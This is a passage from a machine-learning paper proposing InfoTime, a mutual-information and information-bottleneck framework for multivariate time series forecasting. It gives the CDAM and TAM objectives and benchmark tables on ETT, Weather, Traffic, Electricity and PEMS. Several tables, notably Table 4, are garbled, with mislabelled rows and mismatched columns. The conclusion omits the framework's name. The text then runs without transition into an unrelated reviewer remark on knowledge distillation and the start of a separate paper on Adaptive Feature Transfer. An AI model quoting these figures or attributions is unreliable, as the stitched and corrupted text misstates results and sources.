capture the seasonal and trend features of historical series which also achieves $O(L \log L)$ complexity and has a better performance. Afterword, FEDformer (Zhou et al., 2022) employs the mixture-of-expert to enhance the seasonal-trend decomposition and achieves $O(L)$ complexity. The above methods focus on modeling temporal dependency yet omit the correlation of different variables. Crossformer (Zhang & Yan) introduces Two-Stage Attention to effectively capture the cross-time and cross-dimension dependency. Recently, several works (Murphy & Chen, 2022; Nie et al., 2022; Zeng et al., 2022) observe that modeling cross-dimension dependency makes neural models suffer from overfitting in most benchmarks, therefore, they propose Channel-Independence methods to avoid this issue. However, the improvement is based on the sacrifice of cross-variable information. Besides, existing models primarily focus on extracting correlations of historical series while disregarding the correlations of target series. ### 2.2 MUTUAL INFORMATION AND INFORMATION BOTTLENECK Mutual Information (MI) is an entropy-based measure that quantifies the dependence between random variables which has the form: $$I(X; Y) = \int p(x, y) \log \frac{p(x, y)}{p(x)p(y)} \, dx \, dy = E_{p(x,y)} \left[ \log \frac{p(x, y)}{p(x)p(y)} \right]$$ (1) Mutual Information was used in a wide range of domains and tasks, including feature selection (Kwak & Choi, 2002), causality (Butte & Kohane, 1999), and Information Bottleneck (Tishby et al., 2000). Information Bottleneck (IB) was first proposed by Tishby et al. (2000) which is an information theoretic framework for extracting the most relevant information in the relationship of... the input with respect to the output, which can be formulated as \( \max I(Y; Z) - \beta I(X; Z) \). Several works (Fishby & Zaslavsky [2015], Shwartz-Ziv & Tishby [2017]) try to use the Information Bottleneck framework to analyze the Deep Neural Networks by quantifying Mutual Information between the network layers and deriving an information theoretic limit on DNN efficiency. Variational Information Bottleneck (VIB) was also proposed (Alemi et al., 2016) to bridge the gap between Information Bottleneck and deep learning. In recent years, many lower-bound estimations (Belghazi et al., 2018; Oord et al., 2018) and upper-bound estimations (Poole et al., 2019; Cheng et al., 2020) have been proposed to estimate MI effectively which are useful to estimate VIB. Nowadays, MI and VIB have been widely used in computer vision (Schulz et al., 2020; Luo et al., 2019), natural language processing (Mahabadi et al., 2021; West et al., 2019; Voita et al., 2019), reinforcement learning (Goyal et al., 2019; Igl et al., 2019), and representation learning (Federici et al., 2020; Hjelm et al., 2018). However, Mutual Information and Information Bottleneck are less researched in Multivariate Long-term series forecasting. 3 METHOD In multivariate time series forecasting, one aims to predict the future value of time series \( y_t = s_{t+T+1:t+T+P} \in R^{P \times C} \) given the history \( x_t = s_{t:t+T} \in R^{T \times C} \), where \( T \) and \( P \) is the number of time steps in the past and future. \( C \geq 1 \) is the number of variables. Given time series \( s \), we divide it into history set \( X = \{x_1, ..., x_N\} \) and future set \( Y = \{y_1, ..., y_N\} \), where \( N \) is the number of samples. As shown in Figure 1(a), deep learning methods first extract latent representation \( Z^i \) from \( X \) (Channel-mixing), or \( X^i \) (Channel-independent), and then generate target series \( Y^i \) from \( Z^i \). A natural assumption is that these \( C \) series are associated which helps to improve the forecasting accuracy. Therefore, to utilize the cross-variable dependencies while eliminating superfluous information, in Section 3.1 we propose the Cross-Variable Decorrelation Aware Feature Modeling (CDAM) to extract cross-variable dependencies. In section 3.2, we introduce Temporal Aware Modeling (TAM) to predict the future series. 3.1 CROSS-VARIABLE DECORRELATION AWARE FEATURE MODELING Recent studies (Nie et al., 2022; Zeng et al., 2022; Zhou et al., 2021; Zhang & Yan) have demonstrated that Channel-independence is more effective in achieving high-level performance than Channel-mixing. However, multivariate time series contain correlations among variables. Channel-mixing aims to take advantage of these cross-variable dependencies to predict future series. In fact, it fails to improve the performance of MTSF. This may be because Channel-mixing introduces that superfluous information. To verify this, we introduce CDAM to extract cross-variable information while eliminating superfluous information. Specifically, inspired information bottlenecks, CDAM maximizes the joint mutual information among the latent representation \( Z^i \), its univariate input \( X^i \) and the corresponding univariate target series \( Y^i \) while minimizing the mutual information between latent representation \( Z^i \) of one single univariate time series and other multivariate series input \( X^o \). Thus, we have the objective: \[ \max I(Y^i, X^i; Z^i) \text{ s.t. } I(X^o; Z^i) \leq I_c, \] where \( I_c \) is the information constraint, \( X \) is the set of multivariate historical series, \( X^i \) is the historical series of \( i \)-th variable, \( X^o \) is the other multivariate series, \( Z^i \in R^d \) is the representation of \( X^i \) via mixing \( X^o \) and used to predict the \( i \)-th future series \( Y^i \). With the introduction of a Lagrange multiplier \( \beta \), we can maximize the objective function for \( i \)-th channel: \[ R_{IB}^i = I(Y^i, X^i; Z^i) - \beta I(X^o; Z^i) \] \[ = I(Y^i; Z^i|X^i) + I(X^i; Z^i) - \beta I(X^o; Z^i), \] where \( \beta \geq 0 \) controls the tradeoff between \( I(Y^i; Z^i|X^i) \), \( I(X^i; Z^i) \) and \( I(X^o; Z^i) \), the larger \( \beta \) corresponds to lower mutual Information between \( X^o \) and \( Z^i \), and also means that \( Z^i \) needs to retain the important information in \( X^o \) and eliminate the irrelevant information to ensure \( Y^i \) can be accurately predicted. However, the Mutual Information \( I(X^i, Y^i; Z^i) \) and \( I(X^o; Z^i) \) are intractable, we now provide the variational lower bound and upper bound for \( I(X^i, Y^i; Z^i) \) and \( I(X^o; Z^i) \), respectively. Lower bound for $I(X^i; Y^i; Z^i)$. The joint mutual information between latent representation $Z^i$, $i$-th historical series $X^i$, and $i$-th target series $Y^i$ is defined as (More details are shown in Appendix A.3.1): $$I(X^i, Y^i; Z^i) = I(Z^i; X^i) + I(Z^i; Y^i|X^i)$$ $$= \mathbb{E}_{p(z^i, y^i, x^i)} [\log p(y^i|x^i, z^i)] + \mathbb{E}_{p(z^i, x^i)} [\log p(x^i|z^i)] + H(Y^i, X^i),$$ (4) where the joint entropy $H(Y^i, X^i) = -\int p(y^i, x^i) dx^i dy^i$ is only related to the dataset and cannot be optimized, so can be ignored. Therefore, MI can be simplified as: $$I(X^i, Y^i; Z^i) = \mathbb{E}_{p(z^i, y^i, x^i)} [\log p(y^i|x^i, z^i)] + \mathbb{E}_{p(z^i, x^i)} [\log p(x^i|z^i)] + \text{constant}.$$ (5) Since $p(y^i|x^i, z^i)$ and $p(x^i|z^i)$ are intractable, we introduce $p_\theta(y^i|z^i, x^i)$ and $p_\theta(x^i|z^i)$ to be the variational approximation to $p(y^i|x^i, z^i)$ and $p(x^i|z^i)$, respectively. Thus the variational lower bound is as follows (More details are shown in Appendix A.3.2): $$I(X^i, Y^i; Z^i) - \text{constant} \geq \mathbb{E}_{p(z^i, y^i, x^i)} [\log p_\theta(y^i|x^i, z^i)] + \mathbb{E}_{p(z^i, x^i)} [\log p_\theta(x^i|z^i)]$$ $$= I_v(X^i, Y^i; Z^i).$$ (6) Hence, we can achieve the maximization of $I(X^i, Y^i; Z^i)$ by maximizing $I_v(X^i, Y^i; Z^i)$. We assume the variational distribution $p_\theta(y^i|z^i, x^i)$ and $p_\theta(x^i|z^i)$ as the Gaussian distribution. Thus, the first term of $I_v(X^i, Y^i; Z^i)$ is the negative log-likelihood of the prediction of $Y^i$ given $Z^i$ and $X^i$, and the second term aims to the reconstruction of $X^i$ given $Z^i$. Upper bound for $I(X^o; Z^i)$. Next, to minimize the MI between the latent representation $Z^i$ and historical series $X^o$, we adopt the sampled vCLUB (Cheng et al., 2020), which is defined as: $$I_{vCLUB-S}(X^o; Z^i) = \frac{1}{N} \sum_{n=1}^{N} \left[ \log q_\theta(z^i_n | x^o_n) - \log q_\theta(z^i_n | x^o_{k'_n}) \right],$$ (7) where $(z^i_n, x^o_{k'_n})$ is a negative pair and $k'_n$ is uniformly selected from indices 1, 2,...N. Thus we can minimize $I(X^o; Z^i)$ by minimizing $I_{vCLUB-S}(X^o; Z^i)$. It enables the model to extract useful cross-variable information while eliminating irrelevant information. Finally, we can convert the intractable objective function $\mathcal{R}^i_{IB}$ of all channels in Eq. 3 as: $$\mathcal{L}_{IB} = \frac{1}{C} \sum_{i=1}^{C} \left[ -I_v(X^i, Y^i; Z^i) + \beta I_{vCLUB-S}(X^o; Z^i) \right] \geq -\frac{1}{C} \sum_{i=1}^{C} \mathcal{R}^i_{IB}.$$ (8) 3.2 Temporal Correlation Aware Modeling To alleviate the error accumulation effects, previous works (Nie et al., 2022; Zeng et al., 2022; Zhou et al., 2021; Zhang & Yan) use a single-step forecaster which is usually a fully-connected network to predict the future series. Different from auto-regressive forecaster, single-step forecaster assumes the predicted future time steps are independent of each other given the historical time series. Then, the training objective of the single-step forecaster can be expressed as follows: $$p(y^i_j|z^i, x^i) = \prod_{j=1}^{P} p(y^i_j|z^i, x^i)$$ (9) Although the single-step forecaster outperforms the auto-regressive forecaster, it Figure 2: Architecture of TAM with 4x downsampling. We downsample the target series and forecasted series utilizing single-forecaster into four subsequences, respectively. And then we maximize the mutual information between the adjacent subsequences of forecasted series and target series. fails to model the temporal correlations of different timesteps in the target series. In contrast to NLP, time series data is a low-density information source (Lin et al., 2023), and one unique property of time series is that the temporal relations (e.g., the trend and the seasonal) between downsampling adjacent sub-sequences are largely preserved (Liu et al., 2022a). Based on the above observations, we propose TAM which improves the correlation of predicted future time steps by iteratively down-samples and optimizes mutual information between consecutive sub-sequences of both the forecasted and target series. After extracting cross-variable feature $Z^i$, We first generate $\hat{Y}^i$ using a single-step forecaster by utilizing the historical data of the $i$-th channel $X^i$ and cross-variable $Z^i$, the forecasted series $\hat{Y}$ and target series $Y$ are then downsampled $N$ times. For the $n$-th ($n \leq N$) downsampling, we generate $m$ sub-sequences $\hat{Y} = \{\hat{Y}_1, ..., \hat{Y}_m\}, Y = \{Y_1, ..., Y_m\}$, where $m = 2^n$ and $\hat{Y}_j \in R^{E \times C}$. Then we maximize the mutual information between $\hat{Y}_j^i$ and $Y_{j-1}^i, Y_{j+1}^i$, given $X^i$, where $1 < k < m$. Therefore, the loss function of $n$-th downsampling can be calculated as: $$L_n = -\frac{1}{mC} \sum_{i=1}^{C} \left[ I(Y_j^i; \hat{Y}_j^i | X^i) + I(Y_{m-1}^i; \hat{Y}_m^i | X^i) + \sum_{j=2}^{m-1} I(Y_{j-1}^i; \hat{Y}_j^i | X^i) + I(Y_{j+1}^i; \hat{Y}_j^i | X^i) \right]$$ And the variational lower bound of $I(Y_{j-1}^i; \hat{Y}_j^i | X^i)$ is as follows (More details are shown in Appendix A.3.2): $$I(Y_{j-1}^i; \hat{Y}_j^i | X^i) \geq \mathbb{E}_{p(y_{j-1}^i, \hat{y}_j^i, x^i)} \left[ p_\theta(y_{j-1}^i | \hat{y}_j^i, x^i) \right]$$ Furthermore, considering the efficiency, we assume that the time steps of a sub-sequence are independent given the adjacent sub-sequence. Therefore, $I(Y_{j-1}^i; \hat{Y}_j^i | X^i)$ can be simplified as $I(Y_{j-1}^i; \hat{Y}_j^i | X^i) = \sum_{k=1}^{T} I(Y_{j-1,k}^i; \hat{Y}_j^i | X^i)$ and we can generate the entire sub-sequence in a single step without auto-regression. For the $n$-th downsampling, TAM will generate $2 \times (2^n - 1)$ sub-sequences $\hat{Y}' = \{\hat{Y}_1', \hat{Y}_2', \hat{Y}_3', ..., \hat{Y}_m'\}$, these sub-sequences that are not at ends are predicted by its left and right adjacent sub-sequences respectively. We splice these $2 \times (2^n - 1)$ sub-sequences into a new series $\hat{Y}_n = \{\hat{Y}_1', \frac{\hat{Y}_1' + \hat{Y}_2'}{2}, ..., \hat{Y}_m'\}$. After $N$ times downsampling, we have generated $N + 1$ series. And we use these $N + 1$ series as the final forecasting results, thus we have the following loss function: $$L_p = ||Y - (\lambda \sum_{n=1}^{N} \frac{\hat{Y}_n}{N} + (1 - \lambda)\hat{Y})||_2^2$$ In contrast to single-step forecasters that generate multi-step predictions without considering the correlation between the predicted series, our proposed method, referred to as TAM, explicitly models the correlation of predicted future time steps. It achieves this by iteratively down-sampling and optimizing the mutual information between consecutive sub-sequences of both the forecasted and target series. This approach allows the model to establish more accurate representations of future sequences, thereby enhancing the overall predictive performance. By incorporating the correlation between predicted time steps, TAM considers the temporal dependencies within the forecasted series and captures the underlying patterns in the data. This iterative down-sampling and mutual information optimization procedure ensures that the model effectively leverages the available information to generate more accurate and coherent predictions. Integrating CDAM and TAM, the total loss of InfoTime can be written as: $$L_{total} = L_{IB} + \sum_{n=1}^{N} L_n + L_p$$ 4 EXPERIMENTS In this section, we extensively evaluate the proposed InfoTime on nine real-world benchmarks using various Channel-mixing and Channel-Independence models, including state-of-the-art models. Baselines. Since our method can be easily applied to deep-learning-based forecasting models, we evaluate InfoTime adopted by several popular baselines including the state-of-the-art method. For Channel-mixing models, we select Informer (Zhou et al., 2021), Non-stationary Transformer (Liu et al., 2022b), denoting as Stationary, and Crossformer (Zhang & Yan). For Channel-Independence models, we use PatchST (Nie et al., 2022) and also propose RMLP which consists of two linear layers with relu activation, and also uses the reversible instance normalization (Kim et al., 2021) (see Appendix A.1 for more details). Datasets. We evaluate the performance of InfoTime in nine widely-used real-world datasets. Here is a detailed description of these datasets. (1) The ETT (Zhou et al., 2021) (Electricity Transformer Temperature) dataset contains two years of data from two separate countries in China with intervals of 1-hour level (ETTh) and 15-minute level (ETTm) collected from electricity transformers. Each time step contains six power load features and oil temperature. (2) The Electricity dataset describes 321 clients’ hourly electricity consumption from 2012 to 2014. (3) The Traffic dataset contains the road occupancy rates from various sensors on San Francisco Bay area freeways, which is provided by California Department of Transportation. (4) the Weather dataset contains 21 meteorological indicators collected at around 1,600 landmarks in the United States. (5) The PEMS (Chen et al., 2001) (PEMS03, PEMS04, and PEMS08) measures the highway traffic of California in real-time every 30 seconds. We follow the standard protocol that divides each dataset into the training, validation, and testing subsets according to the chronological order. The split ratio is 6:2:2 for the ETT dataset and 7:1:2 for others. 4.1 Main Results Table 1 compares the forecasting accuracy of the Channel-mixing baselines and InfoTime. The results show that InfoTime consistently outperforms all three baselines, Informer, Stationary, and Crossformer, by a large margin. Moreover, the effectiveness of InfoTime is more evident for the long sequence prediction which may be long sequence prediction is more difficult and more likely to lead the model depending on superfluous cross-variable information. InfoTime shows a stable performance in contrast to the baselines, which show a high increase in error as prolonging the prediction length. For example, when the prediction length increases from 96 to 720 on the ETTm2 dataset, the forecasting error of Informer significantly increases from 0.365 to 3.379. In contrast, InfoTime shows a much slight increase in error. A similar tendency appears with the other prediction lengths, datasets, and baseline models as well. These results demonstrate that InfoTime makes the baseline models more robust to prediction target series. Additionally, to study how InfoTime can perform better than baselines, we visualize the testing error for each epoch in Figure 3. Overall, InfoTime shows lower and more stable test errors compared to the baselines. Moreover, the baselines are extremely prone to overfitting in the early stages of training, and InfoTime can effectively alleviate this problem. https://archive.ics.uci.edu/ml/datasets/ElectricityLoadDiagrams20112014, http://pems.dot.ca.gov/, https://www.bgc-jena.mpg.de/wetter/. Table 1: Multivariate long-term series forecasting results on Channel-mixing models with different prediction lengths $O \in \{96, 192, 336, 720\}$. We set the input length $I$ as 96 for all the models. The best result is indicated in bold font. Avg is averaged from all four prediction lengths and Pro means the relative MSE or MAE reduction. | Models | Informer | Stationary | Crossformer | |--------|----------|------------|-------------| | | Original | w/Ours | Original | w/Ours | Original | w/Ours | | Metric | MSE | MAE | MSE | MAE | MSE | MAE | | ETTH1 | | | | | | | | 96 | 0.865 | 0.713 | 0.381 | 0.394 | 0.598 | 0.498 | | 192 | 1.008 | 0.792 | 0.435 | 0.430 | 0.602 | 0.520 | | 336 | 1.107 | 0.809 | 0.485 | 0.461 | 0.677 | 0.573 | | 720 | 1.181 | 0.865 | 0.534 | 0.524 | 0.719 | 0.597 | | Avg | 1.040 | 0.794 | 0.458 | 0.452 | 0.649 | 0.547 | | Pro | - | 55.9% | 43.0% | - | - | 33.5% | | ETTH2 | | | | | | | | 96 | 3.755 | 1.525 | 0.336 | 0.390 | 0.362 | 0.393 | | 192 | 5.602 | 1.931 | 0.468 | 0.470 | 0.481 | 0.453 | | 336 | 4.721 | 1.835 | 0.582 | 0.534 | 0.524 | 0.487 | | 720 | 3.647 | 1.625 | 0.749 | 0.620 | 0.512 | 0.494 | | Avg | 4.431 | 1.729 | 0.534 | 0.504 | 0.470 | 0.457 | | Pro | - | 87.9% | 70.9% | - | - | 20.9% | | ETTm1 | | | | | | | | 96 | 0.672 | 0.571 | 0.326 | 0.367 | 0.396 | 0.401 | | 192 | 0.795 | 0.669 | 0.371 | 0.391 | 0.471 | 0.436 | | 336 | 1.212 | 0.871 | 0.408 | 0.416 | 0.517 | 0.464 | | 720 | 1.166 | 0.823 | 0.482 | 0.464 | 0.664 | 0.527 | | Avg | 0.961 | 0.733 | 0.396 | 0.409 | 0.512 | 0.457 | | Pro | - | 58.7% | 44.2% | - | - | 25.0% | | ETTm2 | | | | | | | | 96 | 0.365 | 0.453 | 0.187 | 0.282 | 0.201 | 0.291 | | 192 | 0.533 | 0.563 | 0.277 | 0.351 | 0.275 | 0.335 | | 336 | 1.363 | 0.887 | 0.380 | 0.420 | 0.350 | 0.377 | | 720 | 3.379 | 1.338 | 0.607 | 0.549 | 0.460 | 0.435 | | Avg | 1.410 | 0.810 | 0.362 | 0.400 | 0.321 | 0.359 | | Pro | - | 74.3% | 50.6% | - | - | 13.7% | | Weather| | | | | | | | 96 | 0.300 | 0.384 | 0.179 | 0.249 | 0.181 | 0.230 | | 192 | 0.598 | 0.544 | 0.226 | 0.296 | 0.286 | 0.312 | | 336 | 0.578 | 0.523 | 0.276 | 0.334 | 0.319 | 0.335 | | 720 | 1.059 | 0.741 | 0.332 | 0.372 | 0.411 | 0.393 | | Avg | 0.633 | 0.548 | 0.253 | 0.312 | 0.299 | 0.317 | | Pro | - | 60.0% | 43.0% | - | - | 15.7% | | Traffic| | | | | | | | 96 | 0.719 | 0.391 | 0.505 | 0.348 | 0.599 | 0.332 | | 192 | 0.696 | 0.379 | 0.521 | 0.354 | 0.619 | 0.341 | | 336 | 0.777 | 0.420 | 0.520 | 0.337 | 0.651 | 0.347 | | 720 | 0.864 | 0.472 | 0.552 | 0.352 | 0.658 | 0.358 | | Avg | 0.764 | 0.415 | 0.524 | 0.347 | 0.631 | 0.344 | | Pro | - | 31.4% | 16.3% | - | - | 23.1% | | Electricity| | | | | | | | 96 | 0.274 | 0.368 | 0.195 | 0.300 | 0.168 | 0.271 | | 192 | 0.296 | 0.386 | 0.193 | 0.291 | 0.186 | 0.285 | | 336 | 0.300 | 0.394 | 0.206 | 0.300 | 0.194 | 0.297 | | 720 | 0.373 | 0.439 | 0.241 | 0.332 | 0.224 | 0.316 | | Avg | 0.310 | 0.397 | 0.208 | 0.305 | 0.193 | 0.292 | | Pro | - | 32.9% | 23.1% | - | - | 9.8% | We also list the forecasting results of Channel-independence baselines in Table 2. It is worth noting that InfoTime also outperforms Channel-independence baselines, indicating that although Channel-independence models exhibit promising results, incorporating cross-variable features can further enhance their effectiveness. Additionally, we evaluate InfoTime on the PEMS datasets, which consist of variables with clear geographical correlations. The results in Table 3 demonstrate a significant performance gap between PatchTST and RMLP in comparison to Informer, suggesting that Channel-independence models may not be optimal in scenarios where there are clear correlations between variables. In contrast, our framework exhibits improved performance for both Channel-mixing and Channel-independence models (We also verify the effectiveness of InfoTime on synthetic data, as show in Appendix A.2). Table 2: Multivariate long-term series forecasting results on Channel-Independent models with different prediction lengths. We set the input length $I$ as 336 for all the models. The best result is indicated in bold font. See Table 6 in the Appendix for the full results. | Models | Metric | ETTh1 | ETTh2 | Traffic | |--------|--------|-------|-------|---------| | | | 96 | 192 | 336 | 720 | 96 | 192 | 336 | 720 | 96 | 192 | 336 | 720 | | PatchTST | Original MSE | 0.375 | 0.414 | 0.440 | 0.460 | 0.290 | 0.332 | 0.366 | 0.420 | 0.367 | 0.385 | 0.398 | 0.434 | | | MAE | 0.399 | 0.421 | 0.440 | 0.473 | 0.342 | 0.369 | 0.392 | 0.424 | 0.251 | 0.259 | 0.265 | 0.287 | | | w/Ours | 0.365 | 0.403 | 0.427 | 0.433 | 0.283 | 0.322 | 0.356 | 0.407 | 0.358 | 0.379 | 0.391 | 0.425 | | | MSE | 0.389 | 0.413 | 0.428 | 0.453 | 0.335 | 0.359 | 0.382 | 0.417 | 0.245 | 0.254 | 0.261 | 0.280 | | | MAE | 0.380 | 0.414 | 0.439 | 0.470 | 0.290 | 0.329 | 0.364 | 0.430 | 0.383 | 0.401 | 0.414 | 0.443 | | RMLP | Original MSE | 0.401 | 0.421 | 0.436 | 0.471 | 0.343 | 0.368 | 0.390 | 0.426 | 0.269 | 0.276 | 0.282 | 0.309 | | | MAE | 0.367 | 0.404 | 0.426 | 0.439 | 0.285 | 0.322 | 0.358 | 0.414 | 0.364 | 0.384 | 0.398 | 0.428 | | | w/Ours | 0.391 | 0.413 | 0.429 | 0.459 | 0.335 | 0.359 | 0.381 | 0.413 | 0.249 | 0.258 | 0.266 | 0.284 | Table 3: Multivariate long-term series forecasting results on three baselines and PEMS datasets with different prediction lengths. We set the input length $I$ as 336 for all the models. The best result is indicated in bold font. (See Table 9 for the ablation results of PEMS datasets.) | Models | Metric | PEMS03 | PEMS04 | PEMS08 | |--------|--------|--------|--------|--------| | | | 96 | 192 | 336 | 720 | 96 | 192 | 336 | 720 | 96 | 192 | 336 | 720 | | PatchTST | Original MSE | 0.180 | 0.207 | 0.223 | 0.291 | 0.195 | 0.218 | 0.237 | 0.321 | 0.239 | 0.292 | 0.314 | 0.372 | | | MAE | 0.281 | 0.295 | 0.309 | 0.364 | 0.296 | 0.314 | 0.329 | 0.394 | 0.324 | 0.351 | 0.374 | 0.425 | | | w/Ours | 0.115 | 0.154 | 0.164 | 0.198 | 0.110 | 0.118 | 0.129 | 0.149 | 0.114 | 0.160 | 0.177 | 0.209 | | | MSE | 0.223 | 0.251 | 0.256 | 0.286 | 0.221 | 0.224 | 0.237 | 0.261 | 0.218 | 0.243 | 0.241 | 0.281 | | | MAE | 0.160 | 0.184 | 0.201 | 0.254 | 0.175 | 0.199 | 0.210 | 0.255 | 0.194 | 0.251 | 0.274 | 0.306 | | RMLP | Original MSE | 0.257 | 0.277 | 0.291 | 0.337 | 0.278 | 0.294 | 0.306 | 0.348 | 0.279 | 0.311 | 0.328 | 0.365 | | | MAE | 0.117 | 0.159 | 0.146 | 0.204 | 0.103 | 0.114 | 0.130 | 0.154 | 0.116 | 0.156 | 0.175 | 0.181 | | | w/Ours | 0.228 | 0.252 | 0.246 | 0.285 | 0.211 | 0.219 | 0.236 | 0.264 | 0.215 | 0.235 | 0.242 | 0.255 | | Informer | Original MSE | 0.139 | 0.152 | 0.165 | 0.216 | 0.132 | 0.146 | 0.147 | 0.145 | 0.156 | 0.175 | 0.187 | 0.264 | | | MAE | 0.240 | 0.252 | 0.260 | 0.290 | 0.238 | 0.249 | 0.247 | 0.245 | 0.262 | 0.266 | 0.274 | 0.325 | | | w/Ours | 0.109 | 0.120 | 0.144 | 0.194 | 0.107 | 0.124 | 0.124 | 0.136 | 0.099 | 0.123 | 0.147 | 0.196 | | | MSE | 0.216 | 0.228 | 0.247 | 0.282 | 0.215 | 0.230 | 0.231 | 0.245 | 0.204 | 0.224 | 0.242 | 0.278 | | | MAE | 0.120 | 0.143 | 0.156 | 0.220 | 0.109 | 0.116 | 0.129 | 0.139 | 0.151 | 0.180 | 0.252 | 0.223 | | Stationary | Original MSE | 0.222 | 0.242 | 0.252 | 0.300 | 0.214 | 0.220 | 0.230 | 0.240 | 0.235 | 0.247 | 0.262 | 0.285 | | | MAE | 0.101 | 0.131 | 0.153 | 0.190 | 0.096 | 0.114 | 0.125 | 0.135 | 0.103 | 0.144 | 0.184 | 0.217 | | | w/Ours | 0.206 | 0.229 | 0.245 | 0.273 | 0.199 | 0.217 | 0.229 | 0.243 | 0.200 | 0.220 | 0.245 | 0.278 | | Crossformer | Original MSE | 0.159 | 0.233 | 0.275 | 0.315 | 0.149 | 0.216 | 0.230 | 0.276 | 0.141 | 0.162 | 0.199 | 0.261 | | | MAE | 0.270 | 0.319 | 0.351 | 0.383 | 0.261 | 0.320 | 0.324 | 0.369 | 0.253 | 0.269 | 0.306 | 0.355 | | | w/Ours | 0.119 | 0.166 | 0.189 | 0.223 | 0.114 | 0.139 | 0.161 | 0.171 | 0.088 | 0.108 | 0.134 | 0.171 | | | MSE | 0.217 | 0.250 | 0.265 | 0.293 | 0.215 | 0.236 | 0.258 | 0.275 | 0.190 | 0.206 | 0.222 | 0.251 | 4.2 Ablation Study In our approach, there are two components: CDAM and TAM. We perform an ablation study on the ETTh1, ETTh2, and Weather datasets with Informer and PatchTST. **+TAM** means that we add TAM to these baselines and **+InfoTime** means that we add both CDAM and TAM to baselines. We analyze the results shown in Table 4. Compared with baselines using the single-step forecaster, TAM performs better in most settings, which indicates the importance of cross-time correlation. For Channel-mixing models, we find that InfoTime can improve the performance of Channel-mixing models significantly, and alleviate the overfitting problem effectively. For Channel-Independence models, InfoTime can still improve the performance of Channel-Independence models, which indicates that correctly establishing the dependency between variables is an effective way to improve performance. Table 4: Component ablation of InfoTime. We set the input length $I$ as 336 for PatchTST and 96 for Informer. The best results are in **bold** and the second best are underlined. (See Table 8 and Table 7 in the Appendix for the full ablation results.) | Models | Metric | ETTh1 | Weather | |--------|--------|-------|---------| | | | Original | +TAM | +InfoTime | Original | +TAM | +InfoTime | | 96 | MSE | 0.865 | 0.713 | 0.598 | 0.565 | 0.381 | 0.394 | | | MAE | 0.375 | 0.399 | 0.367 | 0.391 | 0.365 | 0.389 | | 192 | MSE | 1.008 | 0.792 | 0.694 | 0.640 | 0.435 | 0.430 | | | MAE | 0.440 | 0.440 | 0.429 | 0.430 | 0.427 | 0.428 | | 336 | MSE | 1.107 | 0.809 | 0.853 | 0.719 | 0.485 | 0.461 | | | MAE | 0.460 | 0.473 | 0.435 | 0.455 | 0.433 | 0.453 | | 720 | MSE | 1.181 | 0.865 | 0.914 | 0.741 | 0.534 | 0.524 | | | MAE | 0.152 | 0.199 | 0.149 | 0.197 | 0.144 | 0.194 | | 96 | MSE | 0.300 | 0.384 | 0.277 | 0.354 | 0.179 | 0.249 | | | MAE | 0.197 | 0.243 | 0.192 | 0.238 | 0.189 | 0.238 | | 192 | MSE | 0.598 | 0.544 | 0.407 | 0.447 | 0.226 | 0.296 | | | MAE | 0.250 | 0.284 | 0.247 | 0.280 | 0.239 | 0.279 | | 336 | MSE | 0.578 | 0.523 | 0.529 | 0.520 | 0.276 | 0.334 | | | MAE | 0.320 | 0.335 | 0.321 | 0.332 | 0.312 | 0.331 | (a) Informer on ETTh1 (b) Stationary on ETTh1 (c) PatchTST on ETTh1 (d) RMLP on ETTh1 Figure 4: Evaluation on hyper-parameter $\beta$ and $\lambda$. We evaluate the impact of $\beta$ with Informer and Stationary on the ETTh1 dataset, we also evaluate $\lambda$ with PatchTST and RMLP on the ETTh1 dataset. 4.3 Effect of Hyper-Parameters We evaluate the effect of hyper-parameter $\beta$ on the ETTh1 and ETTm2 datasets with two baselines. In Figure 4, we increase the value of $\beta$ from 0 to $1e^5$ and evaluate MSE with different prediction windows on two datasets and two baselines. When $\beta$ is small, baselines perform poorly and unstably. As $\beta$ increases, baselines perform better and more stable. In addition, as the prediction window increases, the overfitting problem of baselines is more and more serious, so a larger $\beta$ is needed to remove superfluous information. We also evaluate $\lambda$ with PatchTST and RMLP, we observe that the larger the $\lambda$, the better models’ performance, and when $\lambda \geq 0.8$, the performance is stable. 5 Conclusion This paper investigates two key factors in MTSF: temporal correlation and cross-variable correlation. To utilize the cross-variable correlation while eliminating the superfluous information, we introduce Cross-Variable Decorrelation Aware Modeling (CDAM). In addition, we also propose Temporal Correlation Aware Modeling (TAM) to model temporal correlations of predicted series. Integrating CDAM and TAM, we build a novel time series modeling framework for MTSF termed . Extensive experiments on various real-world MTSF datasets demonstrate the effectiveness of our framework. References Alexander A Alemi, Ian Fischer, Joshua V Dillon, and Kevin Murphy. Deep variational information bottleneck. arXiv preprint arXiv:1612.00410, 2016. Mohammad Taha Bahadori and Zachary Chase Lipton. Temporal-clustering invariance in irregular healthcare time series. arXiv preprint arXiv:1904.12206, 2019.
FItPCl4uEc
However, in the general feature-based knowledge distillation framework [1], both teacher and student features can be transformed before minimizing their distances. This makes the proposed method a simple variant in the feature-based knowledge distillation framework and thus lack novelty.
Efficient Transfer Learning from Arbitrary Pre-Trained Models Anonymous authors Paper under double-blind review Abstract Transfer learning typically involves loading pre-trained weights as an initialization, followed by fine-tuning on a downstream task. As pre-trained models become ever larger, this procedure is becoming prohibitively expensive, as we are forced to re-use the pre-trained architecture for fine-tuning. This procedure also precludes combining multiple pre-trained models that learn complementary information. Moreover, alternatives such as knowledge distillation do not reflect that we wish to transfer aspects of the pre-trained representation that are most relevant to the downstream task. To address these challenges, we introduce Adaptive Feature Transfer (AFT). Instead of transferring weights, AFT operates purely on features, thereby decoupling the choice of the pre-trained model from the possibly smaller downstream model. AFT (1) enables transfer from multiple pre-trained models, even over multiple modalities, with minimal training overhead and no inference overhead; (2) selectively transfers the information in the pre-trained features most relevant for the downstream task, through a prior that favors low mutual information between the downstream inputs and features given the pre-trained features; (3) performs feature transfer in an efficient kernel formulation that prioritizes the most relevant degrees of freedom. Empirically, AFT delivers a substantial boost in performance across diverse vision, language, and multi-modal datasets, relative to both standard transfer learning and knowledge distillation with the downstream model. Anonymous code for reproducing our results are available at https://anonymous.4open.science/r/aft-6C30. Figure 1: Adaptive Feature Transfer (AFT) enables compute-efficient transfer learning from an arbitrary set of pre-trained models into a single downstream model, significantly outperforming competing methods including Knowledge Distillation (KD) and B-Tuning (You et al., 2022) when averaged over (a) 6 vision tasks and (b) 8 NLP tasks. (c) AFT performance correlates uniquely well with the quality of the pre-trained features, as measured by the linear probe accuracy. The marker size indicates pre-trained model size, ranging from 87M to 2.7B. 1 Introduction Despite its increasing importance, transfer learning methodology has not kept up with the demands of modern deep learning. It remains the standard practice to simply start with a pre-trained parameter vector and then fine-tune on downstream data with the same architecture. As pre-trained models continue to grow in size (Bommasani et al., 2021; Brown et al., 2020; Dosovitskiy et al., 2020; Zhai et al., 2022), the computational burden of fine-tuning them drastically 